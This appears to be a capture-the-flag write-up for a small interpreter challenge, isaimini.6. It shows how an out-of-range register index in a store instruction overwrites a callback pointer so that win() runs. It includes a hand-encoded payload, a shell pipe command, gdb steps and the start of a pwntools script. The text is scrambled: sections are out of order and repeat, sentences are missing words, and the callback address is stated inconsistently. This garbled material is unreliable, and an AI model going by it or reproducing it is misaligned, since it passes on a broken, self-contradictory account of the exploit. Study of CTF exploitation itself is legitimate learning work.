void win(void) puts("Success!"); // In the real challenge this prints the flag, e.g. // system("/bin/cat flag.txt");
# Instead of assembling, we manually encode: payload = b"\x01\x01" + p64(win_addr) # MOV r1, win payload += b"\x05\x10\x01" # ST [r16], r1 (write win → callback) payload += b"\x09" # HLT
*(uint64_t*)regs[dst] = regs[src]; regs[dst] is taken directly from a user‑controlled register index. The interpreter that dst is within 0‑15 . If we use a register index of 0x10 (16) , regs[16] points past the allocated register array, landing in the .bss area where the global variable callback lives: isaimini.6
# Send the payload via stdin printf "$payload" | ./isaimini.6 :
Success! If the real binary prints the flag, you will see it after Success! . (gdb) file isaimini.6 (gdb) set disassembly-flavor intel (gdb) break *0x00401430 # break at start of execute() (gdb) run (gdb) x/4gx $rsp # view saved RIP after HLT (gdb) x/gx 0x00603010 # examine callback after ST (gdb) continue You should see that after the ST instruction the memory at 0x00603010 holds 0x401b10 . When the interpreter reaches the final if(callback) check, it jumps to that address and prints the success message. 8. Full Exploit Script (Python / pwntools) #!/usr/bin/env python3 from pwn import * void win(void) puts("Success
The goal is to craft an input that makes the interpreter print . The binary contains a hidden “secret” flag, but the only way to retrieve it is to cause the interpreter to call the function win() that prints the flag. 2. Files | File | Description | |------|-------------| | isaimini.6 | 64‑bit ELF executable (stripped, no debug symbols). | | input.txt | Empty starter file – you may ignore it and pipe your own payload to the binary. |
regs[0] -> 0x00602000 regs[1] -> 0x00602008 ... regs[15] -> 0x00602078 regs[16] -> 0x00602080 <-- this is exactly the address of `callback` Therefore, a overwrites callback with the address of win . If we use a register index of 0x10
Thus, if we can , the program will call win after finishing the instruction stream, and we win. 5. Vulnerability Discovery The ST instruction performs: